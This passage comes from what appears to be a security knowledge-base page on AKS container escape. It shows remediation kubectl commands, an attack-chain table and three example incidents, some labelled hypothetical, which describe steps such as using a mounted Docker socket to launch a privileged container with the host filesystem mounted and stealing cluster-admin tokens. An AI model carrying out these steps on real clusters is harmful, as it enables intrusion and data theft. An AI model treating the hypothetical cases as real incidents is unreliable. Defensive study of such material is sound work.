   kubectl delete node <node-name>
       
   # In AKS, node will be automatically replaced by nodepool
   # Verify new node joins cluster
   kubectl get nodes -w
   

   Command (Revoke Compromised Credentials):

   # Rotate service account tokens
   kubectl delete secret $(kubectl get secret -n <namespace> -o name | grep <service-account>) -n <namespace>
       
   # Force token regeneration
   kubectl patch serviceaccount <service-account> -n <namespace> -p '{"secrets": []}'
   

---

13. RELATED ATTACK CHAIN

Step	Phase	Technique	Description
1	Initial Access	[IA-EXPLOIT-005] AKS Control Plane Exploitation	Attacker gains initial container access via vulnerable AKS control plane
2	Privilege Escalation (In-Container)	[PE-EXPLOIT-005] Pod Security Context Escalation	Attacker escalates privileges within container namespace
3	Current Step	[PE-EXPLOIT-004] Container Escape to Host	Attacker breaks out of container, gains host-level access
4	Lateral Movement	[PE-VALID-015] AKS Node Identity Compromise	Attacker uses host access to compromise node identity/managed identity
5	Persistence	Backdoor in host filesystem, service startup modification	Attacker establishes persistence beyond pod lifecycle
6	Impact	[IMPACT-RANSOM-001] Ransomware Deployment on Azure VMs	Attacker deploys malware across all cluster nodes and connected resources

---

14. REAL-WORLD EXAMPLES

Example 1: AKS Cluster Compromise via Windows Container Escape (Hypothetical based on CVE-2025-21196)

• Target: Financial services company running multi-tenant SaaS platform on AKS
• Timeline: January 2025 (post-CVE disclosure, pre-patch deployment)
• Technique Status: Attacker deployed malicious microservice, exploited CVE-2025-21196 from Windows pod to escape to node
• Impact:
  • Access to host filesystem revealed service credentials stored in C:\app\config\secrets.xml
  • Attacker pivoted to Azure Storage account containing customer data (1M+ records)
  • Established persistence via scheduled task on Windows node
  • Lateral movement to 7 additional nodes in cluster before detection
• Detection: Network traffic anomaly: outbound HTTPS to non-whitelisted IP detected by Azure Network Watcher
• Reference: Microsoft Security Advisories - CVE-2025-21196 (pattern-based)

Example 2: Kubernetes Cluster Compromise via Container Runtime Socket Mount

• Target: Startup company running development/staging Kubernetes cluster
• Timeline: July 2024
• Technique Status: Developer accidentally mounted Docker socket in debugging pod; compromised pod used socket to create privileged container
• Attack Chain:
  1. Attacker gained access to development pod (via exposed app vulnerability)
  2. Discovered /var/run/docker.sock mounted in pod
  3. Used docker CLI to create privileged container with -v /:/host mount
  4. Accessed host filesystem, enumerated Kubernetes secrets
  5. Extracted RBAC tokens for cluster-admin service account
  6. Escalated to full cluster compromise in 30 minutes
• Impact:
  • Access to all 50+ microservices running in cluster
  • Customer data from PostgreSQL database exfiltrated
  • CI/CD pipeline compromised; malicious code pushed to production
• Detection: Falcon Sensor detected suspicious container creation; Wiz runtime analysis flagged socket mount in pod spec during code review
• Reference: BlueTeam Blog - Runtime Socket Security (hypothetical pattern)

Example 3: IoT Edge Device Compromise via Runtime Escalation

• Target: Manufacturing plant using Azure IoT Edge for industrial sensors
• Timeline: November 2024
• Technique Status: Attacker deployed malicious edge module; escalated privileges via Edge runtime security manager delegation
• Attack Chain:
  1. Attacker compromised IoT device via firmware vulnerability
  2. Deployed malicious module to Edge runtime posing as legitimate sensor workload
  3. Exploited insufficient isolation in Edge security manager to escalate module privileges
  4. Accessed host device secrets and certificates
  5. Pivoted to plant’s operational technology (OT) network via MQTT bridge
• Impact:
  • Industrial control system compromise
  • Production line halted for 4 hours
  • Safety system interference detected but contained
• Detection: Anomalous MQTT traffic and privilege escalation attempts detected by Azure IoT security agent
• Reference: Azure IoT Security - Runtime Hardening Guide

---

This site is open source. Improve this page.